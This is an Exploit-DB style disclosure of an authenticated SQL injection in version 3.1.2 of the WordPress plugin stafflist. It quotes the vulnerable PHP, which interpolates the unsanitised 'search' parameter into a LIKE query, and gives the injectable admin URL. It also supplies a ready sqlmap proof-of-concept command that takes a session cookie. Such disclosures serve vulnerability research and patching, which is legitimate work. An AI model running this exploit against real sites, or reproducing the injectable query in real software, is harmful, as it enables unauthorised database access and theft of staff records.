WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)

EDB-ID:

50928

CVE:

N/A




Platform:

PHP

Date:

2022-05-11


# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
	$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
			LOWER(firstname) LIKE '%{$w}%' OR
			LOWER(department)  LIKE '%{$w}%' OR
			LOWER(email) LIKE '%{$w}%'" : "");


# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib